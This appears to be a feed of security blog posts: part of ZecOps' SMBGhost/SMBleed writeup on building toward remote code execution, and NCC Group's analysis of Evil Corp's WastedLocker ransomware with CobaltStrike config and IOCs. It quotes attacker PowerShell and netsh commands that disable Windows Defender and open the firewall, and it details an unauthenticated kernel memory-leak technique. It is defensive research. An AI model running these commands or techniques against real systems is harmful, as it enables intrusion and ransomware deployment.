ZecOps classify forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities, that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.


You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression


This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group

By: nccsante
23 June 2020 at 12:25

Authors: Nikolaos Pantazopoulos, Stefano Antenucci (@Antelox) Michael Sandee and in close collaboration with NCC’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

1. Introduction

WastedLocker is a new ransomware locker we’ve detected being used since May 2020. We believe it has been in development for a number of months prior to this and was started in conjunction with a number of other changes we have seen originate from the Evil Corp group in 2020. Evil Corp were previously associated to the Dridex malware and BitPaymer ransomware, the latter came to prominence in the first half of 2017. Recently Evil Corp has changed a number of TTPs related to their operations further described in this article. We believe those changes were ultimately caused by the unsealing of indictments against Igor Olegovich Turashev and Maksim Viktorovich Yakubets, and the financial sanctions against Evil Corp in December 2019. These legal events set in motion a chain of events to disconnect the association of the current Evil Corp group and these two specific indicted individuals and the historic actions of Evil Corp.

2. Attribution and Actor Background

We have tracked the activities of the Evil Corp group for many years, and even though the group has changed its composition since 2011, we have been able to keep track of the group’s activities under this name.

2.1 Actor Tracking

Business associations are fairly fluid in organised cybercrime groups, Partnerships and affiliations are formed and dissolved much more frequently than in nation state sponsored groups, for example. Nation state backed groups often remain operational in similar form over longer periods of time. For this reason, cyber threat intelligence reporting can be misleading, given the difficulty of maintaining assessments of the capabilities of cybercriminal groups which are accurate and current.

As an example, the Anunak group (also known as FIN7 and Carbanak) has changed composition quite frequently. As a result, the public reporting on FIN7 and Carbanak and their various associations in various open and closed source threat feeds can distort the current reality. The Anunak or FIN7 group has worked closely with Evil Corp, and also with the group publicly referred to as TA505. Hence, TA505 activity is sometimes still reported as Evil Corp activity, even though these groups have not worked together since the second half of 2017.

It can also be difficult to accurately attribute responsibility for a piece of malware or a wave of infection because commodity malware is typically sold to interested parties for mass distribution, or supplied to associates who have experience in monetising access to a specific type of business, such as financial institutions. Similarly, it is easy for confusion to arise around the many financially oriented organised crime groups which are tracked publicly. Access to victim organisations is traded as a commodity between criminal actors and so business links often exist which are not necessarily related to the day to day operations of a group.

2.2 Evil Corp

Nevertheless, despite these difficulties, we feel that we can assert the following with high confidence, due to our in depth tracking of this group as it posed a significant threat to our clients. Evil Corp has been operating the Dridex malware since July 2014 and provided access to several groups and individual threat actors. However, towards the end of 2017 Evil Corp became smaller and used Dridex infections almost exclusively for targeted ransomware campaigns by deploying BitPaymer. The majority of victims were in North America (mainly USA) with a smaller number in Western Europe and instances outside of these regions being just scattered, individual cases. During 2018, Evil Corp had a short lived partnership with TheTrick group; specifically, leasing out access to BitPaymer for a while, prior to their use of Ryuk.

In 2019 a fork of BitPaymer usually referred to as DoppelPaymer appeared, although this was ransomware as a service and thus was not the same business model. We have observed some cooperation between the two groups, but as yet can draw no definitive conclusions as to the current relationship between these two threat actor groups.

After the unsealing of indictments by the US Department of Justice and actions against Evil Corp as group by the US Treasury Department, we detected a short period of inactivity from Evil Corp until January 2020. However, since January 2020 activity has resumed as usual, with victims appearing in the same regions as before. It is possible, however, that this was primarily a strategic move to suggest to the public that Evil Corp was still active as, from around the middle of March 2020, we failed to observe much activity from them in terms of BitPaymer deployments. Of course, this period coincided with the lockdowns due to the COVID19 pandemic.

The development of new malware takes time and it is probable that they had already started the development of new techniques and malware. Early indications that this work was underway included the use of a variant of Gozi we refer to as Gozi ISFB 2 variant. It is thought that this variant is intended as a replacement for Dridex botnet 501 as one of the persistent components on a target network. Similarly, a customized version of the CobaltStrike loader has been observed, possibly intended as a replacement for the Empire PowerShell framework previously used.

The group has access to highly skilled exploit and software developers capable of bypassing network defences on all different levels. The group seems to put a lot of effort into bypassing endpoint protection products; this observation is based on the fact that when a certain version of their malware is detected on victim networks the group is back with an undetected version and able to continue after just a short time. This shows the importance of victims fully understanding each incident that happens. That is, detection or blocking of a single element from the more advanced criminal actors does not mean they have been defeated.

The lengths Evil Corp goes through in order to bypass endpoint protection tools is demonstrated by the fact that they abused a victim’s email so they could pose as a legitimate potential client to a vendor and request a trial license for a popular endpoint protection product that is not commonly available.

It appears the group regularly finds innovative but practical approaches to bypass detection in victim networks based on their practical experience gained throughout the years. They also demonstrate patience and persistence. In one case, they successfully compromised a target over 6 months after their initial failure to obtain privileged access. They also display attention to detail by, for example, ensuring that they obtain the passwords to disable security tools on a network prior to deploying the ransomware.

2.3 WastedLocker

The new WastedLocker ransomware appeared in May 2020 (a technical description is included below). The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. The abbreviation of the victim’s name was also seen in BitPaymer, although a larger portion of the organisation name was used in BitPaymer and individual letters were sometimes replaced by similar looking numbers.

Technically, WastedLocker does not have much in common with BitPaymer, apart from the fact that it appears that victim specific elements are added using a specific builder rather than at compile time, which is similar to BitPaymer. Some similarities were also noted in the ransom note generated by the two pieces of malware. The first WastedLocker example we found contained the victim name as in BitPaymer ransom notes and also included both a and email address. Later versions also contained other Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. Interestingly the user parts of the email addresses listed in the ransom messages are numeric (usually 5 digit numbers) which is similar to the 6 to 12 digit numbers seen used by BitPaymer in 2018.

Evil Corp are selective in terms of the infrastructure they target when deploying their ransomware. Typically, they hit file servers, database services, virtual machines and cloud environments. Of course, these choices will also be heavily influenced by what we may term their ‘business model’ – which also means they should be able to disable or disrupt backup applications and related infrastructure. This increases the time for recovery for the victim, or in some cases due to unavailability of offline or offsite backups, prevents the ability to recover at all.

It is interesting that the group has not appeared to have engaged in extensive information stealing or threatened to publish information about victims in the way that the DoppelPaymer and many other targeted ransomware operations have. We assess that the probable reason for not leaking victim information is the unwanted attention this would draw from law enforcement and the public.

3. Distribution

While many things have changed in the TTPs of Evil Corp recently, one very notable element has not changed, the distribution via the SocGholish fake update framework. This framework is still in use although it is now used to directly distribute a custom CobaltStrike loader, described in 4.1, rather than Dridex as in the past years. One of the more notable features of this framework is the evaluation of wether a compromised victim system is part of a larger network, as a sole enduser system is of no use to the attackers. The SocGholish JavaScript bot has access to information from the system itself as it runs under the privileges of the browser user. The bot collects a large set of information and sends that to the SocGholish server side which, in turn, returns a payload to the victim system. Other methods of distribution also appear to still be in use, but we have not been able to independently verify this at the time of writing.

4. Technical Analysis

4.1 CobaltStrike payloads

The CobaltStrike payloads are embedded inside two types of PowerShell scripts. The first type (which targets Windows 64-bit only) decodes a base64 payload twice and then decrypts it using the AES algorithm in CBC mode. The AES key is derived by computing the SHA256 hash of the hard-coded string ‘saN9s9pNlD5nJ2EyEd4rPym68griTOMT’ and the initialisation vector (IV), is derived from the first 16 bytes of the twice base64-decoded payload. The script converts the decrypted payload (a base64-encoded string) to bytes and allocates memory before executing it.

The second type is relatively simpler and includes two embedded base64-encoded payloads, an injector and a loader for the CobaltStrike payload. It appears that both the injector and the loader are part of the ‘Donut’ project [3].

An interesting behaviour can be spotted in the CobaltStrike payloads that are delivered from the second type of PowerShell scripts. In these, the loader has been modified with the purpose of detecting CrowdStrike software (Figure 1). If the C:\\Program Files\\CrowdStrike directory exists, then the ‘FreeConsole’ Windows API is called after loading the CobaltStrike payload. Otherwise, the ‘FreeConsole’ function is called before loading the CobaltStrike beacon. It is assumed that this is an attempt to bypass CrowdStrike’s endpoint solution, although it still unclear if this is the case.

Figure 1: Decompilation showing CrowdStrike specific detection logic

4.2 The Crypter

WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, the code turned out to be very basic and used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader.

The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied.

The first action performed by the crypter code is to check some specific registry key. In the variants analysed the registry key is either: interface\{b196b287-bab4-101a-b69c-00aa00341d07} or interface\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}. These keys relate to the UCOMIEnumConnections Interface and the IActiveScriptParseProcedure32 interface respectively. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique.

In the next step the crypter allocates a memory buffer calling the VirtualAlloc API. A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter’s code in memory with the code of the payload just decrypted, and jumps to its entry point.

As noted above, we have observed this crypter being used by other malware families as well. Related information and IOCs can be found in the Appendix.

4.3 WastedLocker Ransomware

WastedLocker aims to encrypt the files of the infected host. However before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly.

First, Wastedlocker decrypts the strings which are stored in the .bss section and then calculates a DWORD value that is used later for locating decrypted strings that are related to the encryption process. This is described in more detail in the String encryption section. In addition, the ransomware creates a log file lck.log and then sets an exception handler that creates a crash dump file in the Windows temporary folder with the filename being the ransomware’s binary filename.

If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder. Once loaded, the hijacked DLL (winmm.dll) is patched to execute the aforementioned ADS.

The ransomware supports the following command line parameters (Table 1):

Parameter Purpose
-r i. Delete shadow copies
ii. Copy the ransomware binary file to %windir%\system32 and take ownership of it (takeown.exe /F filepath) and reset the ACL permissions
iii. Create and run a service. The service is deleted once the encryption process is completed.
-s Execute service’s entry
-p directory_path Encrypt files in a specified directory and then proceed with the rest of the files in the drive
-f directory_path Encrypt files in a specified directory
Table 1 – WastedLocker command line parameters

It is also worth noting that in case of any failure from the first two parameters (-r and –s), the ransomware proceeds with the encryption but applies the following registry modifications in the registry key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:

Name Modification
ProxyBypass Deletes this key
IntranetName Deletes this key
UNCAsIntranet Sets this key to 0
AutoDetect Sets this key to 1
Table 2 – Registry keys

The above modifications apply to both 32-bit and 64-bit systems and is possibly done to ensure that the ransomware can access remote drives. However, a bug is included in the architecture identification code. The ransomware authors use a well-known method to identify the operating system architecture. The ransomware reads the memory address 0x7FFE0300 (KUSER_SHARED_DATA) and checks if the pointer is zero. If it is then the 32-bit process of the ransomware is running in a Windows 64-bit host (Figure 2). The issue is that this does not work on Windows 10 systems.

Figure 2: Decompilation showing method used to identify operating system architecture

Additionally, WastedLocker chooses a random name from a generated name list in order to generate filename or service names. The ransomware creates this list by reading the registry keys stored in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control and then separates their names whenever a capital letter is found. For example, the registry key AppReadiness will be separated to two words, App and Readiness.

4.4 Strings Encryption

The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware’s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware’s compilation timestamp.

The code’s authors use an interesting method to locate the encrypted strings related to the encryption process. To locate one of them, the ransomware calculates a checksum that is looked up in the encrypted strings table. The checksum is derived from both a constant value that is unique to each string and a fixed value, which are bitwise XORed. The encrypted strings table consists of a struct like shown below for each string.

struct ransomware_string
WORD total_size; // string_length + checksum + ransom_string
WORD string_length;
DWORD Checksum; 
BYTE[string_length] ransom_string;

4.5 Encryption Process

The encryption process is quite straightforward. The ransomware targets the following drive types:

  • Removable
  • Fixed
  • Shared
  • Remote

Instead of including a list of extension targets, WastedLocker includes a list of directories and extensions to exclude from the encryption process. Files with a size less than 10 bytes are also ignored and in case of a large file, the ransomware encrypts them in blocks of 64MB.

Once a drive is found, the ransomware starts searching for and encrypting files. Each file is encrypted using the AES algorithm with a newly generated AES key and IV (256-bit in CBC mode) for each file. The AES key and IV are encrypted with an embedded public RSA key (4096 bits). The RSA encrypted output of key material is converted to base64 and then stored into the ransom note.

For each encrypted file, the ransomware creates an additional file that includes the ransomware note. The encrypted file’s extension is set according to the targeted organisations name along with the prefix wasted (hence the name we have gave to this ransomware). For example, test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note). The ransomware note and the list of excluded directories and extensions is available in the Appendix. Finally, once the encryption of each file has been completed, the ransomware updates the log file with the following information:

  • Number of targeted files
  • Number of files which were encrypted
  • Number of files which were not encrypted due to access rights issues

4.6 WastedLocker Decrypter

During our analysis, we managed to identify a decrypter for WastedLocker. The decrypter requires administrator privileges and similarl to the encryption process, it reports the number of files which were successfully decrypted (Figure 3).

Figure 3: Command line output of the decrypter of WastedLocker


  1. hxxps://
  2. hxxps://
  3. hxxps://


Ransom note







Excluded extensions (in addition to orgnamewasted and orgnamewasted_info)


Excluded directories

*\system volume information*
*\users\all users*
c:\program files (x86)*
c:\program files*
c:\users\ %USERNAME%\appdata\local\temp*
c:\users\ %USERNAME%\appdata\roaming*


IoCs related to targeted ransomware attacks are a generally misunderstood concept in the case of targeted ransomware. Each ransomware victim has a custom build configured or compiled for them and so the knowing the specific hashes used against historic victims does not provide any protection at all. Even if behavioural patterns of the ransomware or network related indicators of the ransomware stage are given (should they exist), it is arguable whether detection of the attack at that stage would allow prevention of the actual attack. We do include known ransomware hashes here; however, please note that these are for RESEARCH PURPOSES ONLY. Blocking files based on these file attributes in any endpoint protection product will not provide any value.

At Fox-IT we focus mainly on detection of the initial stages of such attacks (such as the initial stage of infection) by detecting the various methods of infection delivery as well as the lateral movement stage which typically involves scanning, exploitation and/or credential dumping. Providing these IoCs to the wider public would, however, be counterproductive as the threat actors would simply change these methods or work around the indicators. However, we have included some of them to provide historical as well as current protection or detection against this particular threat, and provide a better understanding of this threat actor. It is also hoped this information will help other organisations to conduct further research into this particular threat.

This particular set of domains is used as C&C by the group for CobaltStrike lateral movement activity, using a custom loader, Note that in 2020 the group has completely switched to using CobaltStrike and is no longer using the Empire PowerShell framework as it is no longer being updated by the original creators.

CobaltStrike C&C Domains

CobaltStrike Beacon config

SETTING_PROTOCOL: short: 8 (DNS: 0, SSL: 1)
SETTING_PORT: short: 443
SETTING_MAXGET: int: 1403644
SETTING_MAXDNS: short: 255
SETTING_PUBKEY SHA256: 14f2890a18656e4e766aded0a2267ad1c08a9db11e0e5df34054f6d8de749fe7
ptr SETTING_DOMAINS:,/jquery-3.3.1.min.js
ptr SETTING_USERAGENT: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
ptr SETTING_SUBMITURI: /jquery-3.3.2.min.js
    print: True
    append: 1522
    prepend: 84
    prepend: 3931
    base64url: True
    mask: True
SETTING_C2_REQUEST (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer:
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   BASE64URL: True
   PREPEND: __cfduid=
   HEADER: Cookie
SETTING_C2_POSTTREQ (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer:
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   MASK: True
   BASE64URL: True
   PARAMETER: __cfduid
   BUILD: output
   MASK: True
   BASE64URL: True
   PRINT: True
ptr SETTING_SPAWNTO_X86: %windir%\syswow64\rundll32.exe
ptr SETTING_SPAWNTO_X64: %windir%\sysnative\rundll32.exe
SETTING_DNS_IDLE: int: 1249756273
SETTING_WATERMARK: int: 305419896 (0x12345678)
ptr SETTING_GARGLE_SECTIONS: '`\x02\x00Q\xfd\x02\x00\x00\x00\x03\x00\xc0\xa0\x03\x00\x00\xb0\x03\x000\xce\x03'
ptr SETTING_PROCINJ_TRANSFORM_X86: '\x02\x90\x90'
ptr SETTING_PROCINJ_TRANSFORM_X64: '\x02\x90\x90'
ptr SETTING_PROCINJ_STUB: *p?'??7???]
ptr SETTING_PROCINJ_EXECUTE: BntdllRtlUserThreadStart
Deduced metadata:
 SSL: True
 Version: CobaltStrike v4.0 (Dec 5, 2019)

Custom CobaltStrike loader samples (sha256 hashes):


.NET injector (Donut) (sha256 hash):


Gozi ISFB v2
This particular set contains C&C domains, bot version, Group ID, RSA key and Serpent encryption keys for 2 Gozi variants used for persistence in victim networks during 2020.

Gozi C&C Domains

Gozi versions


Gozi Group ID


Gozi RSA key


Gozi serpent network encryption keys:


Gozi samples (sha256 hashes)


WastedLocker samples (sha256 hashes)


The following IoCs are specifically related to the crypter used by Evil Corp, which we refer to as CryptOne. Given that CryptOne is used by more malware families and variations than just those related to Evil Corp it is likely that CryptOne is a third party service.

List of metadata extracted from Gozi ISFB v3 samples

Bot version 3.00.854
RSA key 00040000C3DC07D4E1AC941077214371F45B5FDDDF389654D0851D66809BC989ABA850C27D3718D195EE1388087F21FFE759184C185959D1AB5DBC40C3D94C88F46FE8AA1CA94CB07CF110866559456F9DF6F1EAE9C3002F1A257A2F99E3EB3EF6C727516BA65CE56C82E23CBBE87E1EE95F34DD7DC0D07B7C1F57B71BC49DC35DEB2CAB0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001
Group IDs 202004081
Serpent keys 1qzRaTGYO5dpREYI
C&Cs hxxps://

ZLoader (MD5: fb95561e8ed7289d015e945ad470e6db)

RC4 key das32hfkAN3R2TCS
Botnet name pref
Nonce 0x7
Static config RC4 key kyqvkjlpclbcnagbhiwo
C&Cs hxxp://
Binary Distribution hxxp://

Netwalker ransomware (MD5: 198b2443827f771f216cd8463c25c5d8)

SmokeLoader (MD5: 2143d279be8d1bb4110b7ebe8dc3afbc)

RC4 send 0x69A84992
RC4 recv 0x5D7C6D5B
C&Cs hxxp://
Binary Distribution hxxps://

SecTool checker (MD5: b33753fae7bd1e68e0b1cc712b5fb867)

We have found a sample crypted by the CryptOne crypter as used by WastedLocker, which is capable of detecting/disabling a list of security software. It is believed that this tool is used during ransomware deployment, but we have no specific evidence that it was used by Evil Corp. However in the past we have seen execution of commands listed in the tool to disable Microsoft Windows Defender.

List of Registry Keys checked Software\ESET
List of Mutex checked 00082fbb-a419-43f4-bd80-e3631ebbf4c8
Commands executed C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll
C:\Windows\System32\netsh.exe advfirewall firewall add rule name=”Rundll32″ dir=out action=allow protocol=any program=”C:\Windows\system32\rundll32.exe”

SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

15 June 2020 at 17:06
SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE


In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.

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Aiming for RCE

Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in the modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows to leak parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for an unauthenticated RCE exploitation, the first thing we looked for is a way to read memory unauthenticated.

Diving into SMB

Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.

The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.

After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:


If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.

We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:

  • The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
  • The subsequent commands, until authentication completes successfully, must be SMB2 SESSION_SETUP. That is unless anonymous access to named pipes or shares is not restricted, and it is by default.

Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.

A closer look at SMB2 SESSION_SETUP

As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.

The NTLM Authenticate message

After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLM2 V2 Response structure. It’s a  variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) parameter is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks are verifying the AvPairs field.

The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.

AvPairs inside the SMB2 packet.

The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.

At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:

The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:

  • length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
  • length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.

According to the server response we can deduce the answer to our question.

So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.

Observation #1: Lookaside lists

As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.

The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.

Observation #2: Failing the decompression

Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):

In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:

Back to the NTLM Authenticate message

We can use the above observations to make our technique work by using two steps:

  1. Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
  2. Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.

This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.

Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.

Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.

Overcoming the offset limitation

Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.

Address leak POC

You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.

A different approach – decompression

While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.

Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.

We accomplished that by sending a valid packed which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):

There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:

